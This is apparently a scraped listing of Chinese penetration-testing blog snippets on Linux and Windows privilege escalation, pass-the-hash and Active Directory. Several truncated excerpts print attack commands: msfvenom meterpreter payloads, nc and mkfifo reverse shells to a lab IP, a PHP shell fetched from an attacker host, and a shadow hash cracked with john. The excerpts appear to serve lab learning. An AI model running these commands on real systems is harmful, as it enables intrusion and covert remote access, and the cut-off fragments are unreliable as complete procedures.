msf hash 模块//启动 msfconsole //生成反向连接后门 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.128 lport=12345 -f exe > s.exe use exploit/multi/handler set payload windows/meterpreter/reverse_
靶场环境win10-1(域用户),win10-2(域用户),winser2016(域控)PTH(pass-the-hash) HASH 传递pass-the-hash 在内网中是一种很经典的方式,原理就是可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务,而不用提供明文密码。pass the hash 原理:在 Windows 系统中,通常会使用 NTLM 身份认证NTLM
切换用户技巧无需密码切换用户#include <stdio.h> #include <stdlib.h> #include <unistd.h> int main(int argc,char *argv[]) { setreuid(1001,1001); execve("/bin/sh",NULL,NULL); }gcc a.c -o a chmod 777 a
docker逃逸提权免sudo使用docker默认情况下使用docker必须要有sudo权限,对于一台机器多用户使用,只需要管理员将需要使用docker的用户添加到docker用户组(安装docker后默认会创建该组)中,用户重新登录机器即可免sudo使用docker了。创建docker容器后,容器默认账户是root账户,可以更改容器内的所有配置这里模拟真实情况借助弱口令使用coleak用户 登陆
john爆破root密文cat /etc/shadowroot:$6$URZ1c7qW$z5jZA6/j9fb8d4ExJOWuwCjEFo0tfBkfV.D3OIf0c0ukepcZYgrBhO6vjpNbmYct1uco9NrtBw3z50tCoMbqb1:18907:0:99999:7:::gzip -d /usr/share/wordlists/rockyou.txt.gz john -
常见suid提权文件nmap vim find more less bash cp Nano mv awk man wgetshttps://gtfobins.github.io/sudo install -m =xs $(which less) . ./less file_to_readpasswd提权ls -al /etc/passwd -rw-rw-rw-- 1 cc cc 2242 7
脏牛提权 CVE-2016-5195该漏洞是 Linux 内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞, 导致可以破坏私有只读内存映射。黑客可以在获取低权限的的本地用户后,利用此漏洞获取 其他只读内存映射的 写权限,进一步获取 root 权限。漏洞范围以下是主流发行版修复之后的内核版本,如果你的内核版本低于列表里的版本,表示还存在脏牛漏洞Centos7 /RHEL
获取完整交互式SHELLsu root su:必须从终端中执行python伪终端终端有些时候系统的命令终端不允许直接访问,可以使用python虚拟化一个终端来执行python -c 'import pty;pty.spawn("/bin/bash")' python3 -c 'import pty;pty.spawn("/bin/bash")'Linux反弹shell解决乱码bash #从zsh
反弹shellnc反弹nc -e /bin/sh 192.168.10.128 6666 #但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.10.128 6666 >/tmp/fpython反弹import socket,subproc
计划任务提权(cron Jobs)定时任务(cron job)被用于安排那些需要被周期性执行的命令。利用它,你可以配置某些命令或者脚本,让它们在某个设定的时间内周期性地运行。cron 是 Linux 或者类 Unix 系统中最为实用的工具之一。cron 服务(守护进程)在系统后台运行,并且会持续地检查 /etc/crontab 文件和 /etc/cron.*/ 目录。它同样也会检查 /var/sp
环境变量劫持提权PATH是Linux和类Unix操作系统中的环境变量,它指定存储可执行程序的所有bin和sbin目录。当用户在终端上执行任何命令时,它会通过PATH变量来响应用户执行的命令,并向shell发送请求以搜索可执行文件。超级用户通常还具有/sbin和/usr/sbin条目,以便于系统管理命令的执行。echo $PATH /usr/local/sbin:/usr/local/bin:/us
metasploit linux提权msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.10.128 LPORT=12345 -f raw > ./shell.php file_put_contents('../tmp/msf.php',file_get_contents('http://192.168.10.128/shell.ph
常用命令uname -a #查看内核/操作系统/cpu信息 hend -n 1 /etc/issue #查看操作系统版本 cat /proc/version #查看系统信息 hostname #查看计算机名 env #查看环境变量 ifconfig #查看网卡 netstat -lntp # 查看所有监听端口 netstat -antp # 查看所有已经建立的连接 netstat
介绍 Active Directory 证书服务 (Active Directory Certifcate Services,AD CS) 是微软用于实现 PKI 的服务。 证书 ADCS 中的证书是 X.509 格式的数字签名文档,用于加密、签名或身份验证等。 证书常用的属性由下述字段组成 • Subject:主题 • Public Key:公钥 • Extended Key Usages (E
域信任类型 Active Directory 的信任方式可以分为以下几种: • Tree-Root Trust – 双向具有转移性 • Parent-Child Trust – 具有转移性,双向行人 • Forest Trust – 如果两个林创建了信任关系,则林中所有的域都相互信任 – 两个林之间的信任关系无法自动扩展到其他林上 • Realm Trust – ADDS 域可以和非 Window
用户 Windows 系统存在一些为了特定用途而设置的用户,分别是:SYSTEM(系统)、Trustedinstaller(信任程序模块)、Everyone(所有人)、Creator Owner(创建者) 等,这些特殊用户不属于任何用户组,是完全独立的账户。其中 SYSTEM 拥有整台计算机管理权限的账户,一般操作无法获取与它等价的权限。 用户组 Windows 系统内置了许多本地用户组,用于管
常见入口 • SMB 弱密码 • SqlServer 弱密码 LOLBAS,全称 Living Of The Land Binaries and Scripts (and also Libraries),是一种白利用方式,是在 2013 年 DerbyCon 由 Christopher Campbell 和 Matt Graeber 发现,最终 Philip Goh 提出的概念。 这些程序一般有
日志 • 查看日志 eventvwr • 伪造日志 eventcreate • 操作日志 – 3389 登录列表 – 文件打开日志 – 文件修改日志 – 浏览器日志 – 系统事件 – 程序安装记录 – 程序删除记录 – 程序更新记录 • 登录日志 – 系统安全日志• 日志路径 – 系统日志 %SystemRoot%\System32\Winevt\Logs\System.evtx – 安全日志 %
UAC 简介 UAC (User Account Control) 是 Windows Vista 和 Windows Server 2008 引入的一个安全机制,当一些敏 感操作发生时,会跳出提示显式要求系统权限。 当用户登陆 Windows 时,每个用户都会被授予一个 access token,这个 token 中有 security identifer (SID) 的信息,决定了用户的权限。
隐藏文件 • 创建系统隐藏文件 – attrib +s +a +r +h filename / attrib +s +h filename • 利用 NTFS ADS (Alternate Data Streams) 创建隐藏文件 • 利用 Windows 保留字 – aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|
网络信息 • 内网网段信息 • 网卡信息 ipconfig • 外网出口 • ARP 表 arp -a • 路由表 route print • 监听的端口 netstat -ano • 连接的端口 • 端口信息 – Get-NetTCPConnection • hosts 文件 • 主备 DNS • DNS 缓存– ipconfig /displaydns – Get-CimInstance -N
Copyright © 2005-2024 51CTO.COM 版权所有 京ICP证060544号
